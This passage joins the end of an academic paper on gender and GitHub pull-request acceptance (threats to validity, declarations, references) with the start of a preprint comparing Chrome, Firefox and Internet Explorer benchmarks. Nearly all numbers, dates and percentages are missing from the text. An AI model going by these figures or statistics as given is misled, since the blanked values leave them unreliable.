covariate showed a % or better balance improvement. finally, as we noted in the matching procedure for gendered and gender-neutral contributors, to retain reasonable sample sizes, we relaxed the matching criteria by broadening the equivalence classes for numeric variables. specifically, for lines added, lines removed, commits, files changed, pull index, and references, we transformed the data using log rather than log . missing data in some cases, data were missing when we scraped the web to obtain data to supplement the ghtorrent data. we describe how we dealt with these data here. first, information on file types was missing for pull requests that added or deleted more than , lines. the problem was that github does not include file type data on initial page response payloads for large changes, presumably for efficiency reasons. this missing data affects the results of the file type analysis and the propensity score matching analysis; in both cases, pull requests of over , lines added or deleted are excluded. second, when retrieving github user images, we occasionally received abnormal server response errors, typically in the form of http errors. thus, we were unable to determine if the user used a profile image or identicon in , ( . % of users and . % of pull requests). we excluded these users and pull requests when analyzing data on gendered users. third, when retrieving github pull request web pages, we occasionally received abnormal server responses as well. in these cases, we were unable to obtain data on the size of the change (lines added, files changed, etc.), the state (closed, merged, or open), the file type, or the user who merged or closed it, if any. this data comprises . % of pull requests for which we had genders of the pull request creator. these pull requests are excluded from all analyses. threats one threat to this analysis is that additional covariates, including ones that we could not collect, may influence acceptance rate. one example is that we did not account for the github user judging pull requests, even though such users are central to the pull request process. another example is pull requestors’ programming experience outside of github. two covariates we collected, but did not control for, is the project the pull request is made to and the developer deciding on the pull request. we did not control for these covariates because we reasoned that it would discard too many data points during matching. another threat to this analysis is the existence of robots that interact with pull requests. for example, ‘‘snoopy crime cop’’ (https://github.com/snoopycrimecop) appears to be a robot that has made thousands of pull requests. if such robots used an email address that linked to a google profile that listed a gender, our merge rate calculations might be skewed unduly. to check for this possibility, we examined profiles of github users that we have genders for and who have made more than , pull requests. the result was tens of github users, none of whom appeared to be a robot. so in terms of our merge calculation, we are somewhat confident that robots are not substantially influencing the results. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/snoopycrimecop http://dx.doi.org/ . /peerj-cs. another threat is if men and women misrepresent their genders. if so, we inaccurately label some men on github as women, and vice-versa. while emailing the thousands of pull requestors described in this study to confirm their gender is feasible, doing so is ethically questionable; ghtorrent no longer includes personal email addresses, after github users complained of receiving too many emails from researchers (https: //github.com/ghtorrent/ghtorrent.org/issues/ ). another threat is github developers’ use of aliases (vasilescu et al., ); the same person may appear as multiple github users. each alias artificially inflates the number of developers shown in the histograms in fig. . most pull request-level analysis, which represents most of the analyses performed in this paper, are unaffected by aliases that use the same email address. another threat is inaccuracies in our assessment of whether a github member’s gender is identifiable. first, the threat in part arises from our use the gendercomputer program. when gendercomputer labels a github profile as belonging to a man, but a human would perceive the user’s profile as belonging to a woman (or vice-versa), then our classification of gendered profiles is inaccurate in such cases. we attempted to mitigate this risk by discarding any profiles in the gendered profile analysis that gendercomputer classified with low-confidence. second, the threat in part arises from our panel. for profiles we labeled as gender-neutral, our panel may not have picked out subtle gender features in github users’ profiles. moreover, project owners may have used gender signals that we did not; for example, if a pull requestor sends an email to a project owner, the owner may be able to identify the requestor’s gender even though our technique could not. a similar threat is that users who judge pull requests encounter gender cues by searching more deeply than we assume. we assume that the majority of users judging pull requests will look only at the pull request itself (containing the requestor’s username and small profile image) and perhaps the requestor’s github profile (containing username, display name, larger profile image, and github contribution history). likewise, we assume that very few users judging pull requests will look into the requestor further, such as into their social media profiles. although judges could have theoretically found requestors’ google+ profiles using their email addresses (as we did), this seems unlikely for two reasons. first, while pull requests have explicit links to a requestor’s github profile, they do not have explicit links to a requestor’s social media profile; the judge would have to instead seek them out, possibly using a difficult-to-access email address. second, we claim that our github-to-google+ linking technique is a novel research technique; assuming that it is also novel in practice, users who judge pull requests would not know about it and therefore would be unable to look up a user’s gender on their google+ profile. another threat is that of construct validity, whether we are measuring what we aim to measure. one example is our inclusion of ‘‘open’’ pull requests as a sign of rejection, in addition to the ‘‘closed’’ status. rather than a sign of rejection, open pull requests may simply have not yet been decided upon. however, these pull requests had been open for at least days, the time between when the last pull request was included in ghtorrent and when we did our web scrape. given gousios and colleagues’ ( ) finding that % of pull requests are closed within days, insiders likely had ample time to decide on open terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/ghtorrent/ghtorrent.org/issues/ https://github.com/ghtorrent/ghtorrent.org/issues/ http://dx.doi.org/ . /peerj-cs. table acceptance rates for github users not linked to google+ (top row) versus those who are linked (bottom rows), by stated gender. right three columns indicate the percentiles of the number of projects contributed to. gender category users pull requests acceptance rate % confidence interval user not on google+ , , , . % [ . %, . %] user identifies as ‘male’ on google+ , , , . % [ . %, . %] user identifies as ‘female’ on google+ , , . % [ . %, . %] user has no gender listed on google+ , , . % [ . %, . %] user lists ‘declined to state’ for gender on google+ , , . % [ . %, . %] user lists other gender on google+ , . % [ . %, . %] table percentiles of the number of projects contributed to for github users not linked to google+ (top row) versus those who are linked (bottom rows), by stated gender. gender category users pull requests % % % user not on google+ , , , . . . user identifies as ‘male’ on google+ , , , . . . user identifies as ‘female’ on google+ , , . . . user has no gender listed on google+ , , . . . user lists ‘declined to state’ for gender on google+ , , . . . user lists other gender on google+ , . . . pull requests. another example is whether pull requests that do not link to issues signals that the pull request does not fulfill a documented need. a final example is that a github user might be an insider without being an explicit owner or collaborator; for instance, a user may be well-known and trusted socially, yet not be granted collaborator or owner status, in an effort to maximize security by minimizing a project’s attack surface (howard, pincus & wing, ). another threat is that of external validity; do the results generalize beyond the population studied? while we chose github because it is the largest open source community, other communities such as sourceforge and bitbucket exist, along with other ways to make pull requests, such at through the git version control system directly. thus, our study provides limited generalizability to other open source ecosystems. moreover, while we studied a large population of contributors, they represent only part of the total population of developers on github, because not every developer makes their email address public, because not every email address corresponds to a google+ profile, and because not every google+ profile lists gender. to understand this threat, tables and compare github users who we could link to google+ accounts (the data we used in this paper) against those who do not have google+ accounts. the top rows are the main ones of interest. in table , we use an exclusively ghtorrent-based calculation of acceptance rate where a pull request is considered accepted if its commit appears in the commit history of the project; we use a different measure of acceptance rate here because we did not parse pull requests made by people not on google+. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in terms of acceptance rate, users not on google+ have a lower acceptance rate than both males and females on google+. in terms of number of unique projects contributed to, users not on google+ contribute to about the same number as men on google+. a final threat to this research is our own biases as researchers, which may have influenced the results. while it is difficult to control for implicit bias, we can explicitly state what our biases are, and the reader can interpret the findings in that context. first, prior to conducting this research, all researchers on the team did believe that gender bias exists in open source communities, based on personal experience, news articles, and published research. however, none knew how widespread it was, or whether that bias could be detected in pull requests. second, all researchers took nosek and colleagues’ ( ) online test for implicit bias that evaluates a person’s implicit associations between males and females, and work and family. as is typical with most test takers, most authors tended to associate males with work and females with family (kofink: strong; murphy-hill, parnin, and stallings: moderate; terrell and rainear: slight). the exception was middleton, who exhibits a moderate association of female with career and male with family. additional information and declarations funding this material is based in part upon work supported by the national science foundation under grant number . there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science foundation: . competing interests the authors declare there are no competing interests. author contributions • josh terrell, andrew kofink and emerson murphy-hill conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • justin middleton conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • clarissa rainear analyzed the data, wrote the paper, reviewed drafts of the paper. • chris parnin conceived and designed the experiments, contributed reagents/material- s/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • jon stallings conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ncsu irb approved under # . data availability the following information was supplied regarding data availability: data sets from ghtorrent and google+ are publicly available. raw data from figures has been supplied as a supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references antin j, yee r, cheshire c, nov o. . gender differences in wikipedia editing. in: proceedings of the th international symposium on wikis and open collaboration. – . arjona-reina l, robles g, dueas s. . the floss free/libre/open source survey. available at http://floss .libresoft.es. arun s, arun t. . icts, gender and development: women in software production in kerala. journal of international development ( ): – doi . /jid. . benjamini y, hochberg y. . controlling the false discovery rate: a practical and powerful approach to multiple testing. journal of the royal statistical society. series b (methodological) – . brown e, perrett d. . what gives a face its gender?. perception : – doi . /p . burnett m, fleming sd, iqbal s, venolia g, rajaram v, farooq u, grigoreanu v, czerwinski m. . gender differences and programming environments: across programming populations. in: proceedings of the acm-ieee international symposium on empirical software engineering and measurement. . byrnes jp, miller dc, schafer wd. . gender differences in risk taking: a meta- analysis. psychological bulletin ( ): doi . / - . . . . chen x. . stem attrition: college students’ paths into and out of stem fields. statistical analysis report. nces - . national center for education statistics. clopper c, pearson es. . the use of confidence or fiducial limits illustrated in the case of the binomial. biometrika – . davison hk, burke mj. . sex discrimination in simulated employment contexts: a meta-analytic investigation. journal of vocational behavior ( ): – doi . /jvbe. . . doll r. . cohort studies: history of the method ii. retrospective cohort studies. sozial-und präventivmedizin ( ): – doi . /bf . terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://floss .libresoft.es http://dx.doi.org/ . /jid. http://dx.doi.org/ . /p http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /jvbe. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. gilbert jr, williams es, lundberg gd. . is there gender bias in jama’s peer review process? journal of the american medical association ( ): – doi . /jama. . . gorman eh, kmec ja. . we (have to) try harder gender and required work effort in britain and the united states. gender & society ( ): – doi . / . gousios g. . the ghtorrent dataset and tool suite. piscataway: ieee press, – . gousios g, pinzger m, van deursen a. . an exploratory study of the pull-based software development model. in: proceedings of the th international conference on software engineering. icse , new york: acm – . gousios g, vasilescu b, serebrenik a, zaidman a. . lean ghtorrent: github data on demand. – . graham jw, smith sa. . gender differences in employment and earnings in science and engineering in the us. economics of education review ( ): – doi . /j.econedurev. . . . heilman me, wallen as, fuchs d, tamkins mm. . penalties for success: reactions to women who succeed at male gender-typed tasks. journal of applied psychology ( ): doi . / - . . . . ho d, imai k, king g, stuart e. . matchit: nonparametric preprocessing for parametric causal inference. journal of statistical software ( ): – doi . /jss.v .i . howard m, pincus j, wing jm. . measuring relative attack surfaces. in: computer security in the st century. springer, – . knobloch-westerwick s, glynn cj, huge m. . the matilda effect in science communication an experiment on gender bias in publication quality per- ceptions and collaboration interest. science communication ( ): – doi . / . krumholz hm, douglas ps, lauer ms, pasternak rc. . selection of patients for coronary angiography and coronary revascularization early after myocar- dial infarction: is there evidence for a gender bias? annals of internal medicine ( ): – doi . / - - - - . lagesen va. . a cyberfeminist utopia? perceptions of gender and computer science among malaysian women computer science students and faculty. science, technology & human values ( ): – doi . / . landy fj. . stereotypes, bias, and personnel decisions: strange and stranger. industrial and organizational psychology ( ): – doi . /j. - . . .x. lemkau jp. . personality and background characteristics of women in male- dominated occupations: a review. psychology of women quarterly ( ): – doi . /j. - . .tb .x. terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jama. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.econedurev. . . http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /jss.v .i http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. mcloughlin la. . spotlighting: emergent gender bias in undergraduate engineering education. journal of engineering education ( ): – doi . /j. - . .tb .x. mockus a, weiss dm. . predicting risk of software changes. bell labs technical journal ( ): – . moss-racusin ca, dovidio jf, brescoll vl, graham mj, handelsman j. . science faculty’s subtle gender biases favor male students. proceedings of the na- tional academy of sciences of the united states of america ( ): – doi . /pnas. . nafus d. . ‘patches don’t have gender’: what is not open in open source software. new media & society ( ): – doi . / . nosek ba, banaji m, greenwald ag. . harvesting implicit group attitudes and beliefs from a demonstration web site.. group dynamics: theory, research, and practice ( ): doi . / - . . . . reagle j. . ‘‘free as in sexist?’’ free culture and the gender gap. first monday ( ). roth pl, purvis kl, bobko p. . a meta-analysis of gender group differences for measures of job performance in field studies. journal of management ( ): – . shaw sr, braden jp. . race and gender bias in the administration of corporal punishment. school psychology review ( ): – . vasilescu b, capiluppi a, serebrenik a. . gender, representation and online participation: a quantitative study. interacting with computers ( ): – doi . /iwc/iwt . vasilescu b, posnett d, ray b, van den brand mgj, serebrenik a, devanbu p, filkov v. . gender and tenure diversity in github teams. in: chi conference on human factors in computing systems, chi. acm, – . yu y, wang h, filkov v, devanbu p, vasilescu b. . wait for it: determinants of pull request evaluation latency on github. in: mining software repositories (msr), ieee/acm th working conference on. ieee, – . terrell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /pnas. http://dx.doi.org/ . / http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /iwc/iwt http://dx.doi.org/ . /peerj-cs. the rise of chrome a peer-reviewed version of this preprint was published in peerj on october . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. tamary j, feitelson dg. . the rise of chrome. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. the rise of chrome jonathan tamary dror g. feitelson school of computer science and engineering the hebrew university, jerusalem, israel e-mail: feit@cs.huji.ac.il abstract since chrome’s initial release in it has grown in market share, and now controls more than half of the desktop browsers market. in contrast with internet explorer, the previous dominant browser, the growing dominance of chrome was not achieved by marketing practices such as bundling the browser with a pre-loaded operating system. the shift to chrome therefore raises the question of how chrome achieved this remarkable feat, while other browsers such as firefox and opera were left behind. we show that both the performance of chrome and its conformance with relevant standards are typically better than those of the two main contending browsers, internet explorer and firefox. in addition, based on a survey of the importance of major features, chrome product managers seem to have made somewhat better decisions in selecting where to put effort. thus the rise of chrome is consistent with technical superiority over the competition. keywords: browser war, chrome, market share, software adoption, benchmark, feature selection. introduction the most notable use of the internet is the world wide web (www). the web was created by tim berners-lee and his colleagues at cern (the european organization for nuclear research) in . in order to consume information from the web, one must use a web browser to view web pages. the first web browser (which was in fact named worldwideweb) was developed at cern as part of the www project [ ]. but the first popular browser, which set the growth of the web in motion towards the wide use we see today, was mosaic, which was developed by marc andreessen and eric bina at the national center for supercomputing applications (ncsa) in [ ]. the open nature of the web makes it possible for different browsers to co-exist, possibly providing different features, user interfaces, and operating system support. over the years different browsers have competed for the user’s choice. the competition between browsers has led to several “browser wars” — periods of fierce competition between different web browsers that are characterized by technological innovation and aggressive marketing, typi- cally leading to the eventual dominance of one browser and the fall of another. in recent years we have witnessed such a shift (albeit somewhat protracted) from microsoft’s internet explorer to google’s chrome. the reasons for this shift are most probably a mix of technical reasons and marketing reasons. our goal is to explore the technical aspects, and see whether they can explain the growing popularity of chrome. in particular, we wanted to assess the technical quality of chrome and compare it with the quality of its rivals. to do so we downloaded all the version of chrome, firefox, and internet explorer that were released over a period of five years, and compared them using a set of benchmarks which together provide a rather comprehensive coverage of browser functionality and features. as far as we know our work is by far the widest study of its kind. in a nutshell, we find that chrome is indeed technically superior to other browsers according to most commonly- used benchmarks, and has maintained this superiority throughout its existence. also, based on a survey of users, the features pioneered by chrome ahead of its competitors tend to be those that the users consider more important. thus chrome’s rise to dominance is consistent with technical superiority. however, one cannot rule out the large effect of the google brand and the marketing effort that was invested as factors that contributed greatly to the realization of chrome’s technical potential. peerj preprints | https://dx.doi.org/ . /peerj.preprints. v | cc-by . open access | rec: oct , publ: oct the browsers landscape . browsers history not long after the release of the mosaic web browser in it became the most common web browser, keeping its position until the end of . the factors contributing to mosaic’s popularity were inline graphics, which showed text and graphics on the same page, and popularizing the point and click method of surfing. moreover, it was the first browser to be cross-platform including windows and macintosh ports. amazingly, by the end of it’s popularity plummeted to only % of the web browser market [ ]. this collapse in mosaic’s popularity was concurrent to the rapid rise of netscape navigator which was released in december and managed in less than two years to reach around % market share (different sources cite somewhat different numbers). several factors are believed to have caused the fast adoption of netscape by users. first, it was a natural followup of mosaic as it was developed by the same people. second, netscape introduced many technological in- novations such as on-the-fly page rendering, javascript, cookies, and java applets [ ]. third, netscape introduced new approaches to testing and distribution of web browsers by releasing frequent beta versions to users in order to test them and get feedback [ ]. netscape’s popularity peeked in when it held around % market share. but in august microsoft released the first version of internet explorer based on an ncsa mosaic license. a year later, in august , with the release of internet explorer , a browser war was on. by august internet explorer enjoyed % market share [ ]. during this browser war it seems that internet explorer did not have any technological advantage over netscape, and even might have been inferior. therefore, other reasons are needed to explain internet explorer’s success. one reason was that netscape’s cross platform development wasn’t economical: instead of focusing on one dominant platform (windows) it had approximately platforms which caused a loss of focus. meanwhile, microsoft fo- cused on only one platform. second, microsoft bundled internet explorer with windows without a charge, and as windows dominated the desktop operating systems market explorer was immediately available to the majority of users without any effort on their part. in an antitrust investigation in the u.s., microsoft was found guilty of abusing its monopoly in the operating systems market by bundling internet explorer with windows for free. lewis describes this as follows [ ]: “adding internet explorer to windows and calling it windows is innovation in gates’ terminol- ogy, but it is monopolizing according to doj.” settling the antitrust case took several years (october to november ), during which internet explorer deposed netscape as the most popular browser. and once internet explorer was entrenched, it’s market share grew even more due to a positive feedback effect. the standard tags used in html (hyper-text markup language, in which web pages are written) are defined by the w c (world wide web consortium). however, both microsoft and netscape extended the html standard with their own special tags, thus creating two competing sets of html tags and behaviors. web developers with limited resources then had to choose one of these tag sets, and as internet explorer usage grew they opted to use internet explorer’s extensions, thereby making it ever more preferable over netscape [ ]. the dominance of internet explorer was so strong that microsoft didn’t bother to release a major version of internet explorer from until , making do with a service pack for internet explorer as part of a windows xp service pack. up to this point browsers were proprietary software, even if distributed for free. but with the collapse of netscape’s market share, netscape released its netscape communicator . source code in march for com- munity involvement in the development via mozilla.org [ ]. the mozilla suite was created based on this source code release. however, the development continued to be influenced by netscape communications corporation, which had been acquired by aol. david hyatt, joe hewitt, and blake ross were not pleased with the alliance of mozilla with netscape, which was hurting mozilla independence and more importantly led to feature creep and bloat. so in mid they created an experimental branch of the mozilla suite, which kept the user interface but reimplementing the backend from scratch [ ]. this branch became the open source firefox browser, and on august figure : browsers usage data from statcounter.com. , mozilla released a revised road map that reflected a shift from the mozilla suite to firefox [ ]. firefox was finally released on november , [ ]. later, in march , mozilla moved to rapid development with a -week cycle and then a weeks cycle [ , ]. firefox’s market share grew slowly, and by the end of it managed to wrestle away up to % from internet explorer. but by this time a new contender had arrived. google released chrome . on september , . concurrently, google released most of the browser’s source code as an open source project named chromium thus establishing an open source community. the main reason was the belief that a strong community will help improve chrome [ ]. additional reasons were to help drive the web forward as other open source projects like firefox and webkit did, and enabling people to create their own projects based on chromium. as of today the development of chrome is based on the development of stable releases of chromium, and the two browsers are identical in most aspects [ ]. however, it is important to distinguish chrome from chromium, as chrome has several features that are absent from chromium such as a non-free pdf viewer. chrome and chromium moved to a rapid development strategy in mid [ ]. . browsers usage statistics in the six years since its release chrome has dethroned internet explorer, and firefox’s market share has also decreased, as shown in figure . data for such statistics is obtained as follows. browser usage can be tracked using a counter embedded in the html source code of web sites. the counting is implemented using a request to a counting service, enabling the counting service to also extract the browser information from the request and to use it to tabulate browser usage statistics. the data shown is from one of these services, statcounter.com [ ]. there are two main methods to interpret web browsers usage. the first method is to measure how many page loads came from each type of browser in a certain period of time. the second method counts how many unique clients (installations) were active in a certain period of time. therefore, if a user visits web pages, the first method will count these visits as uses of the browser, while in the second method will count them as one user. since the two methods measure different parameters their results may differ. the first method favors browsers that are used by heavy users, while the second method just counts the number of unique users without taking their activity into account, which may be a drawback if we consider users who use the web extensively to be more important. moreover, identifying unique users is non-trivial and requires manipulating the raw data. we therefore use the raw counts data, and specifically the data for desktop browsers only not including mobiles and tablets. (the nick in the graphs at august represents the beginning of collecting data about tablets separately.) as shown in the graph, chrome’s market share has risen consistently over the years, largely at the expense of internet explorer. as of january , chrome was responsible for . % of the page loads while internet explorer was responsible for . %, firefox for . %, and other browsers for . %. note that in fact any site can track the distribution of browser usage among the users who access that site. such tracking may lead to different results if the visitors to a certain site prefer a certain browser. for example, w schools.com (a site devoted to tutorials about web development) also publishes data about browser usage. their results for january are that . % use chrome, . % use firefox, and only . % use internet explorer [ ]. this probably reflects a biased user population of web developers who tend to work on linux platforms rather than on windows. at the opposite extreme, netmarketshare.com claims that only % of the market uses chrome, while fully % still use internet explorer (these figures are again for january ) [ ]. there is a danger that the statcounter data is also biased, but it is thought to provide a good reflection of common usage by the public on popular web sites, because its data is based on counters embedded in many different sites. further justification is given in the threats to validity section. research questions despite possible differences in usage statistics, it is clear that chrome is now a dominant player in the web browser market. the question is how this dominance was achieved, and in particular whether it is justified from the technical point of view. we divide this into the following specific questions: . is chrome technically superior to its competitors? specifically, (a) is the performance of chrome superior to that of its competitors as measured by commonly accepted browser performance benchmarks? (b) is the start-up time of chrome competitive with the start up times of its competitors? (c) does chrome conform to web standards better than its competitors as measured by commonly accepted browser conformance benchmarks? . given that the browser market is not static and web usage continues to evolve, (a) did chrome introduce features earlier than its competitors? (b) were the features that chrome introduced first more important than those introduced by its competitors? to answer these questions we tested the three major browsers which together account for % of the market share. thus we did not initially test opera and safari, whose market share is very low; safari is also less relevant as it is tightly linked to the mac os x platform, so it does not compete with chrome for most users . the question regarding the release of important features earlier also involved a wide user survey to assess the relative importance of different features. note that the performance and conformance evaluations are not tied to one point in time, but rather they are evaluated over the whole period when chrome achieved its rise in market share. as a result we also found interesting information about the consistency (and sometimes inconsistency) of browser benchmarks which was not anticipated in advance. technical performance in this section we present the methodology and results pertaining to answering research question ( ), namely the relative performance of chrome and the competing browsers. . experimental design timing is important to web page designers, because it affects the user experience [ ]. but the precise definitions of performance metrics are complicated to pin down [ ]. as a result quite a few different benchmarks have been designed and implemented over the years. instead of proposing yet another benchmark, we used several of the more a windows version available for only several years and then discontinued. benchmark type content response sunspider performance javascript tasks time browsermark performance general browser performance score canvasmark performance <canvas> tag score peacekeeper performance javascript tasks score start-up times performance cold startup time time html compliance conformance html standard score css test conformance css standard score browserscope security conformance security-enhancing features tests passed table : the benchmarks used in our study and their response variables. figure : the release date of each version tested. widely accepted and commonly used benchmarks to evaluate the technical performance of the different browsers, selecting a set which cover a wide range of functionalities. these benchmarks are divided to two categories. the first category is performance, and tests the performance of different aspects of the browsers. this included general browser performance, aspects of javascript processing, and in particular support for the html <canvas> tag. the second category is conformance, and tests the conformance of the different browsers to common standards such as the html and css standards. note, however, that the tests typically check only that elements of the standard are recognized, and not the quality of the implementation. this is because assessing the quality may be subjective and depend on graphical appearance. in addition we imple- mented our own methodology for measuring startup times, as this was not covered by the available benchmarks. the benchmarks and their response variables are listed in table . note that the benchmarks do not include low-level issues such as memory usage. the reason is that these benchmarks are not intended to characterize the interaction between the browser and the underlying hardware platform, but rather the interaction of the browser with the user. we selected these benchmarks because market share depends on users who are more influenced by general performance and features, not by details of hardware utilization. in order to assess the technical performance of the competing browsers during the period when chrome gained its market leadership, we measured all the releases of these browsers using all the benchmarks. specifically, the measurements covered all chrome versions from to , all firefox versions from to , and all internet explorer versions from to , meaning all the browsers versions in a five year span starting in mid until the end of (figure ). this is the period from the first release of chrome until it achieved around % market share. . execution of measurements the measurements were conducted on two identical core i computers (lenovo thinkcentre m series with i - cpus running at . ghz) with gb ram each, and windows professional sp operating systems. one machine ran windows bit and the other ran windows bit. the browser versions used on the bit system were chrome – , firefox – , and internet explorer – , i.e. all the browsers released up to may . the browsers versions used on the bit system were chrome – , firefox – , and internet explorer – . the versions were divided between the machines since we encountered some compatibility issues with earlier versions figure : comparing the results of two benchmarks on bit and bit platforms. type benchmark repetitions versions with no data internet explorer firefox chrome performance sunspider . . , ≥ ≥ sunspider . . , ≤ ≤ , , browsermark . , . , . canvasmark , , peacekeeper , , , start-up times conformance html compliance n/a , css test n/a browserscope security n/a table : the benchmarks used in our study, how many repetitions were performed, and which browser versions could not be measured. of chrome on windows bit. moreover, it makes sense to switch to bit along the way to reflect the growing adoption of -bit systems. to make sure that the measurements are consistent between bit and bit operating systems and eliminate operating system bias we have checked a third of the browser versions on both systems, focusing on versions with a six months release gap. examples for two of the benchmarks are shown in figure . sunspider . . is an example of a relatively big difference between the results on the two platforms (which is still quite small), and peacekeeper is an example of a very small difference. in general we did not see any dramatic differences between the platforms. we therefore do not present any more results about such comparisons. on all performance benchmarks we ran repetitions of each measurement, while for the start-up times mea- surements we ran repetitions. error bars are used in the graphs to show the standard error. in all cases, the benchmarks and tests were the only thing that ran on the test machines. the test machines had an internet connec- tion outside our firewall, so they were not on the local departmental network. this was done for security reasons, as our systems group refused to allow the use of old (and probably vulnerable) browsers within the firewall. not all the measurements ran properly with all the versions, especially with earlier versions. the problems were due to the fact that most of the benchmarks were designed and written later than some of the browser early versions, and used some features or technology that were not yet implemented in those early versions. the details are given in table . (a) (b) figure : sunspider . . and . . results. note difference in scale for the two versions. . performance benchmarks results and interpretation . . sunspider sunspider is a well known benchmark developed by webkit, an open source web browser engine project. its goal is to measure core javascript performance and enable the comparison of different browsers or successive version of the same browser. webkit designed this benchmark to focus on real problems that developers solve with javascript [ ]. therefore the benchmark does not include microbenchmarks to evaluate specific language features, but rather tasks such as generating a tagcloud from json input, d raytracing, cryptography, and code decompression. moreover, each of the tests is executed multiple times to ensure statistical validity. however, perhaps due to these repetitions, the behavior of the benchmark may actually not mimic real javascript work on production sites [ ]. the benchmark measures the time to perform a set of tasks, so lower values are better. in the study we chose to use version . . , which is the current version and was introduced by webkit in order to make the tests more reliable [ , ]. however, version . . didn’t work on old browser versions (table ). therefore, we used version . . on old browser versions [ ], specifically those that were tested on the bit machine. using sunspider . . we find that when chrome was introduced it scored significantly better than internet explorer and firefox. in the second version tested of firefox (firefox . ) the score was greatly improved but still lagged the parallel chrome version. although internet explorer was released a couple of months after chrome it was five times slower. it took more than two years for firefox and internet explorer to catch up with chrome’s parallel version (figure a). in fact, internet explorer not only caught up with chrome but surpassed it. this superior performance has been attributed to its javascript optimization for dead code elimination, which some say was specifically done to boost sunspider performance [ , ]. in the sunspider . . tests internet explorer continued to show significantly better results compared to its rivals. firefox and chrome showed similar results most of the time (figure b). for some reasons chrome versions and had problems with this benchmark, but these were fixed in chrome . . . browsermark . browsermark . is a general browser benchmark developed by rightware (basemark), a purveyor of benchmark- ing and evaluation technology for the embedded systems industry. originally designed to test mobile and embedded devices, it is nevertheless commonly used to also test desktop browsers. the benchmark tests general browser per- formance including aspects such as page loading, page resizing, standards conformance, and network speed, as figure : browsermark . results. figure : canvasmark results. well as webgl, canvas, html , and css / d. the calculated score combines all of these and higher scores are better. the early versions of internet explorer and firefox did not work with this benchmark (which is understandable given that the benchmark version we used was released only in november ). all of the browsers tested showed a distinct improvement trend as new versions were released (figure ). chrome in all of its versions was better than the equivalent rivals and showed a steady improvement over time. internet explorer also showed an improvement over time but always came in last from all the browsers tested. firefox performance was between chrome and internet explorer. interestingly, it showed an inconsistent behavior, with the general improvement in benchmark score mixed with local decreases in score. . . canvasmark canvasmark is a benchmark for performance testing the html <canvas> tag [ ]. this tag is a container for graphics, which are typically drawn using javascript. the benchmark is composed of several stress tests, using elements that are commonly used in games such as operations on bitmaps, canvas drawing, alpha blending, polygon fills, shadows, and drawing text. each test starts with a simple scene and adds elements until the browser is reduced to a rendering rate of frames-per-second (the rate decreases as the scene becomes more complex). the score is a weighted average of the time the browser managed to perform at above frames-per-second. higher scores are better. in this benchmark’s documentation there was a note for chrome users using windows, encouraging them to change a setting in order to get better results due to a bug in the gpu vsync option for the windows version of chrome. however, we did not change the setting since we want to test the versions as the average user would. the results of running the benchmark show that chrome exhibited inconsistent results over time (figure ). a great improvement was achieved from version to (version is the first shown, because the benchmark did not run on version – ). in contrast there was a sharp decline from version to . later, an improvement occurred from version to , immediately followed by a sharp decline of % of the score in version . but in spite of all these inconsistencies it was still better than firefox and internet explorer during this time. internet explorer showed an improvement from version to version , when it became the best-performing of the three browsers, due to a deterioration in chrome’s scores. chrome surpassed internet explorer again only in the last version tested. firefox had the lowest scores, and does not show any improvement over time. figure : peacekeeper results. . . peacekeeper peacekeeper is a browser benchmark developed by futuremark, a purveyor of mostly hardware benchmarks for desktop and mobile platforms [ ]. (rightware, the company that developed browsermark, was a spinoff from futuremark.) it includes various tests designed to measure the browser’s javascript performance, but given that javascript is so widely used in dynamic web pages, it can actually be considered to be a general benchmark for browser performance. the tests include various aspects of using javascript on modern browsers, such as the <canvas> tag, manipulating large data sets, operations on the dom tree (the document object model, which describes the structure of a web page), and parsing text. the score reflects processing rate (operations per second or frames per second rendered), so higher is better. in addition the benchmark includes various html capability checks, such as webgl graphics, being able to play various video formats, and multithreading support. chrome scored noticeably better results compared to its rivals for this benchmark, throughout the period of time that we checked (figure ). however, note that peacekeeper did not run on early versions of chrome (table ). also, while there was a general trend of improvement, it was not monotonic. firefox and internet explorer scored similar results, both showing an improvement over time but still lagging behind chrome. . start-up time measurement methodology and results an important feature of all browsers, which may affect user satisfaction, is their startup times when they are launched. as we did not find a suitable benchmark that evaluates startup times we conducted specialized measure- ments to test the browser’s cold start-up times. a cold start-up time is when the browser starts for the first time since the operating system was booted. we tested the start-up times as follows. we wrote a script that runs during the operating system start-up. this script launches the browser one minute after the script starts running. the lag is meant to let the operating system finish loading. a time stamp is created just before launching the browser in order to mark the start time. the browser was set to open with a specially crafted page when it came up. the script passed the time 